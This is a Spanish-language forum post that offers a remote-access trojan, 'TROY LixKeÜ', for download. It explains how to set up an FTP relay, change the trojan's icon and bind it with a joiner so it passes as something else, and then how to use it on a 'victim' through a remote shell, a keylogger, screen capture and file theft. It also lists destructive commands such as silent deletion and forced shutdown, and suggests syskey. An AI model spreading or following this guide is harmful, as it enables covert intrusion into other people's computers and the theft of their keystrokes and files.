Holas a todos bueno hoy les presento a un troyano muy particular se llama
TROY LixKeÜ 1.0.0 Bueno que tiene de particular este troyano, es que no necesita saber la ip de la victima ni tampoco le interesa que tipo de conexion tiene ya que es 100% funcional. ¿Como hace esto? Es simple
lo que hace es conectar tanto al cliente como al server a un servidor ftp.
Bueno entonces podemos decir que este troyano es del tipo via ftp
Otra de las ventajas que tiene es que si no se encuentra conectada la victima usted podra enviar igual las funciones y al momento de conectarce la victima el server realizara lo pedido.
<<<<<<<<<DESCARGAR:>>>>>>>>>>Tamaño 4,62 MB (4.844.584 bytes)>>>>tipo RAR<<<<<
http://beto123456789.webcindario.com/INDETECTABLE.rar:http://rapidshare.de/files/23534738/INDETECTABLE.rar.htmlLo que necesitamos para este troyano es:
* Primero un servidor ftp ( Les recomiendo Lycos.es porque es el que yo utilizo
)
* Segundo usuario y contraseña
* Tercero el dominio web
Esto esplicare mas detallado un poco mas adelante por ahora solo intenten conseguir una cuenta y un espacio en Lycos
Una vez conseguido surcribirse tendran que conseguir un espacio web en donde te daran una cuenta ftp (QUE ES LO QUE NOS INTERESA) y un dominio. Estos datos te lo enviaran a tu correo y listo es todo
.
Los archivos que cuenta este troyano son:
Como ven los archivos mas inportante son:
*Desintalador
*Editor
*Cliente
*Server
Comenzamos con editar sus datos de conexion para ello
abrimos el Editor y bamos colo cando los datos que nos piden. En la para donde nos pide dominio web o direccion web ponemos la nuesta que usualmente es
http://usuarios.lycos.es/betoBEN/ en mi caso es >>"betoBEN">> pero en el suyo sera su nombre de usuario de su cuenta. Otra de las cosas es que no se olvisen de poner http:\\ ni menos de olbidarse poner >> \ << al final por que osino el server ni el cliente podran leer los comandos enviados.
Puesto sus datos presionen editar y busquen al cliente y pongan en abrir para editarlo y luego sin cambiar buelban a presionar y editen el server.
Aqui les pongo una imagen para que se guien mejor
:
ALLi ya tienen todo listo para que funcione pero el editor tambien trae otras obciones como la de cambiar el icono la cual
aqui me tienen que prestar mucha pero mucha atencion osino no le ba a funcionar su server. Por que le digo esto ya lo esplico: esto se debe a que si nosotro editamos primero los datos estos datos se escribiran al final del archivo (la contraseña se escribe inscriptada) y el archivo se al executarse se encarga de leer estos datos para conectarse. Ustedes se preguntaran ¿¿¿y que tiene que ver esto con lo de cambiar el icono
??? >>>YO LE CONTESTO>>> Tiene que ver devido a que cuando cambiamos el icono del server o del archivo juntad del brinder el icono y susu datos en binario tambien se escriben al final del archivo. Y que pasa entonces al momento de leer sus datos el server no lo leera sino que leera lo del icono y logrando asi no conectarse.
>>SOLUCION AL PROBLEMA>>: Cambiar primero el icono del server (y del archivo juntad)ANTES DE EDITAR LOS DATOS DEL SERVER Y DE BRINDEAR UN ARCHIVO.
Con respecto a la parte del soft es fasil eligen primero la aplicasion luego el icono el cual puse muchos una carpeta llamada xxxxICONOsxxx y por ultimo le dan en cambiar icono.
***Otra de las cosas que trae es un binder que en este caso es el ASTAROTH que fue echo por Kizar y otros mas,>> bueno ustedes lo conoseran
Este joiner tiene un archivo que se llama JUNTAD el cual es el encargadode guardar los archivos cargados es por esto que si quieren cambiar de icono a su archivo juntado primerodeberan cambiar el icono del JUNTAD.
COMO CONSEJO:>> Primero cambien el ino del server y y del Juntad y luego resin dediquense a hacer todo lo otro es por esto que
PUSE PRIMERO al cambiador de icono en el EDITOR.
>>>>> EL MOMENTO ESPERADO SU MANEJO:<<<<<<<<< Antes que nada quiero aclarar que es su primera version y no traee muchas funciones solo trae las mas basicas y algunas cosas no estan muy bien pero en versiones posteriores se ira supermejorando y agregando mas funciones.
Puse tambien un desintalador por el cual podran probaren su propia compu y poder desintalarla luego de probarla.
Comenzamos: Si hacemos doble clip sobre el fondo podemos ver nuestros datos de conexion y asi comprobar que todo este en orden
*La primera funcion es Estado de conexion: Aqui podremos ver si esta o no conectado la victima, bueno como lo hace
??' lo que hace para saber es por medio de un mensaje que envia el server diciendo que esta conectado pero
ojo este mensaje el server lo envia una sola vez asi que para comprobar verdaderamente la conexion tendremos que presionar el boton RESET para que el cliente figure que esta desconectado y luego le damos en el boton ""funcion"" (pero siempre con el nombre online) para desirle o preguntarle al server si esta o no conectado si este esta conectado de inmediato luego del aviso te aparecera ESTOY CONECTADO , de lo contrario quedara como lo dejo el boton reset. Otra cosa inportante aclararles es que cuando se cierra el CLIENTE ESTE ENVIA UN MENSAJE AL FTP DICIENDO QUE EL SERVER ESTA DESCONECTADO es por ello que necesitamos presinar el boton funcion para comprobarlo de verdad.
En resumen presionen reset y luego en funcion y alli veran en forma eficaz la conexion 
*La segunda opcion es la de shell remota en donde ustedes lo que tengran que hacer es escribir un comando y darle al boton envia, esperar que el comando se haya enviado correctamente y luego los datos apareceran en la caja de texto de abajo.
Para alguien que sabe programar en bat me sabra entender mejo y sabaran utilizarlo.
AQUI LES PONGO ALGUNOS COMANDOS BASICOS ya que con la shell remota se puede hacer practicamente de todo
***************Ver los directorio y manejo de archivos archivos********
dir c:\
del c:\compi.txt q(la "q" elimina en forma cilenciosa) >>>>>Elimina los archivos espesificos
move [/y | /-y] [origen] [destino]>>>< mover archivos
openfiles.exe /disconnect >>>>> desconectar archivo de la red
rename [Unidad:][rutaDeAcceso] nombreDeArchivo1 nombreDeArchivo2>>>cambiar nombre
xcopy Origen [Destino]
****************Apagado y reinicio del equipo**************************
shutdown [{-l|-s|-r|-a}] [-f] [-m [\\nombreEquipo]] [-t xx] [-c "mensaje"] [-d[p]:xx:yy]
shutdows -l >>> cierra la sesion del usuario
shutdows -s >>>> Apaga el equipo
shutdows -r >>> Reinicia
shutdows -a >>>>Enuncia el apagado
shutdows -f >>>>Obliga a las aplicasiones a cerrarse
shutdows -m [\\nombreDeEquipo] >>>Espesifica el quipo que desea apagar
shutdows -c "mensaje" >>> mensaje del apagado
**************abrir programas******************************************
start ["título"] [/drutaDeAcceso] [/i]
start c:\archivo.txt >>>>>ejemplo de como abrir todos los archivos
****************OTRAR FORMA******************************
mplay32 >>>>reproductor de windows
mshearts>>>>Corazones en internet
mstsc>>>>>escritorio remoto
osk>>>>>teclado en pantalla
regedit>>>>registro
scrnsave>>>>pantalla negra
sndrec32>>>>grabador de voz
sndvol32>>>>control de volumen
sol>>>>>solitario
spider>>>solitario spider
ss3dfo>>>cubre pantalla windows
ssbezier>>>>cubre pantalla
ssmarque>>>>cubre pantalla
ssmypics>>>cubre pantalla de sus imagenes
syskey>>><Uno que les recomiendo
tourstart>>>>paseo por xp
write>>>wor pad
wupdmgr>>>internet explore
**************mas comandos*********************************************
rmdir >>>>>>La nueva opción de línea de comandos /s elimina los directorios que contienen archivos y subdirectorios.
net use>>>>Usuarios en conexion
netstat>>> Conexiones establecidas
nbtstat<>> Recursos compartidos
net send (PC REMOTA) (MENSAJE) >>>Envia mensajes por la red lan
date (t nuevo tiempo)>>>>fecha del sistema
ftp>>>>>trensferencia de archivos
hostname>>>>nombre del usuario
%TIME%>>>>>hora
%WINDIR%>>>>directorio de windows
%USERPROFILE%
%USERNAME%>>>>Usuario que inicio sesion
label>>>>crea o elimina la etiqueta del disco c:\
Taskkill >>>>> Finaliza una o más tareas o procesos
***********************************************************************
* Tambien tenemos la transferencia de archivos: Aqui lo que tenemos que hacer es para: DESCARGAR UN ARCHIVO es fasil lo unico que tenemos que hacer es presionar el boton descargar archivo y nos aparecera otra ventana pidiendonos la direccion del archivo remoto ( Para ver los direcctorios utilaza la shell y el comando DIR) y una vez echo esto esperate un tiempo por que no hay barras de progreso para avisarte que el server ya subio el archivo.
Y por ultimo copias esa direccion el tu navegador y te lo descargas ( Atencion estosolo funciona en un navegador FIREFOX)
O intenta con el boton que dice descarga pero funcional es el metodo de arriba.
SUBIDA DE ARCHIVOS: este es mas fasil, buscamos el archivo que queremos subir y luego el server lo descarga en la unidad C:\ (de alli lugo lo podes cortar y pegar en otra parte o donde quieras con la shell remota).
Nota: los archivos subidos tanto por el cliente como por el server tendran que ser borrados en forma manual, es por eso que les puse con los archivos que componen al troy el Smart FTP para instalarlo. De de alli elimina los archivos subidos y no gastar tanto espacio. En versiones posteriores agregare ete tipo de soft al cliente de TROY para no complicarlo tanto.
* Una de las funciones que mas me gusta es esta: la CAPTURA DE PANTALLA
Lo que tenemos que hacer es presionar el boton que dicecapturar pantalla esperara que se haya enviado bien la funcion y despues presionar el borton que dice VER LA PANTALLA.
Creo que es muy fasil y si no se llega a ver bien toda la pantalla cerrala y volve apresionar nuevamente el boton de ver pantalla.
* Keylogger: Esta me sera deficil explicar
lo que tenemos que hacer una vez conectada la victima es presionar el boton capturar teclas pero aqui viene lo malo, usted no podra ver las teclas pulsadas en forma ofline sino que tendra que esperar que la victima reinicie la compu y buelva a ejecutar de nuevo el server y de alli resien presionar el boton VER TECLAS.
Como resumen: usted con la funcion keylogger lo unico que hace es activar un keylloger que anotara todo lo pulsado hasta que la pc de la victima se apague ( lo hice asi por que si el keylogger se encargara de anotar lo pulsado y de enviarlo gastaria demasiado ancho de banda que su victima no podra ni ver una pagina es por eso que me decidi a hacerlo así)
y para ver lo pulsado en todo ese momento que usted lo activo y la pc reinicio presiona ver teclas.
NOTA: en el caso del boton ver teclas es asi porque si nosotros, por ejemplo presionariamos luego de un tiempo de aver presionado el boton de capturar teclas el voton ver teclas no funcionaria por que el server no podra subirlo al ftp ya que el log que esta anotando las teclas se esta sobreescribiendo cada 1 minuto y de este modo seria imposible subirlo.Por ese motibo es que hay que esperar que el server se inicie nuevamente y no activado el key poderlo subir.
Es un poco trambolico, pero lo sabran utilizar.
*ABIRLE EL PAINT: Le puse con ese nombre no crean que esta mal escrito
esta funcion es mas fasil que prender la tele lo unico que hace es abrir el paint en la pc victima.Lo agregue como funcion mas por que fue la prmera que utilize para comprobar que el troyano funcionace es por eso que es importante para mi y la puse.
Bueno espero que les guste y le saken provecho creo que es indetectable, le falta agregar mas funciones pero tampoco esperen de mucho, ya que es su primera version.Me comprometo a decir que en versiones posteriores se mejoraran las funciones y se solucionararan algunos inconveniente que por alli tiene.
LixKeÜsoft Corporatión
Mostrar Mensajes
